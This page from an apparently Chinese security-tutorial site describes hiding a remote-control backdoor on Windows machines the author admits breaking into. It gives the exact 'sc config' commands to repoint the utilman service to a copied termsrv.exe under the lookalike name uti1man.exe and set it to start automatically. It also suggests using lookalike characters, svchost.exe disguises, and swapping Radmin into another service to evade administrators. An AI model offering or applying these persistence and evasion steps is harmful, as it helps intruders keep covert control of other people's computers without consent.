当前位置: 首页 > 图文教程 > 网络安全 > 安全基础 > 服务的隐藏

安全基础
实现高效安全的网络访问控制的解决方案
学会利用加密方法保障电子邮件系统安全
新手入门:常见的病毒前缀的解释
通讯录导进Gmail的经验操作技巧
保障局域网访问internet的速度与安全的技巧
局域网的网上邻居中隐藏共享文件夹
常用的防范sniffer的方法
排除无线网络安全隐患的八大主流技术
outlook或foxmail邮件转入evolution的方法
在浏览器中直接查看照片的EXIF信息
U盘病毒彻底防御办法
多余的本地连接删除的方法
v6677.cn强制设为首页后怎么办?
电脑感染木马桌面多IE图标无法删除
正版用户如何删除产品密钥
如何全面防范邮件病毒的侵蚀
局域网内部禁止修改IP地址
网络钓鱼诈骗也可以专挑有钱人?
视频文件会存在病毒怎么杀毒?
看似不起眼的小动作破坏你计算机安全策略

安全基础 中的 服务的隐藏


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-28   浏览: 118 ::
收藏到网摘: n/a

好久没有所谓技术性的东西了,最近进人家的机器用Radmin监视人家发现现在一般的网管都会检查用户和进程(不过那个任务管理器不知道为什么不能用了,知道有木马都杀不了,不知道Windows怎么搞的),所以手脚就要在这个上面做了。
先自己详细的看下默认的Windows服务

替换或者时注意的问题

1 依存关系
2 二进制路径
3 默认启动还是自动

我靠,还可以在服务管理器里更改说明。

C:\WINNT\system32>copy termsrv.exe .\uti1man.exe
copy termsrv.exe .\uti1man.exe
已复制 1 个文件。


C:\WINNT\system>sc config utilman start= auto
sc config utilman start= auto
[SC] ChangeServiceConfig SUCCESS

C:\WINNT\system>sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe
sc config utilman binpath= C:\WINNT\System32\Uti1Man.exe
[SC] ChangeServiceConfig SUCCESS

至于该替换哪个,我不说啊。最郁闷的是那个Performance Logs and Alerts
和c:\winnt\system\smlogsvc.exe /service
替换Radmin后,明明是禁止的,可是居然端口还等着连接。汗!
只要条件符合,几乎发现不了,除非也是高手。还有就是名字的要求,i与1与l,o与0,呵呵~~
自己发挥啊,很多的svchost.exe也没有人会怀疑吧~~~

说这么多了,自己研究去,很好玩的啊~~~~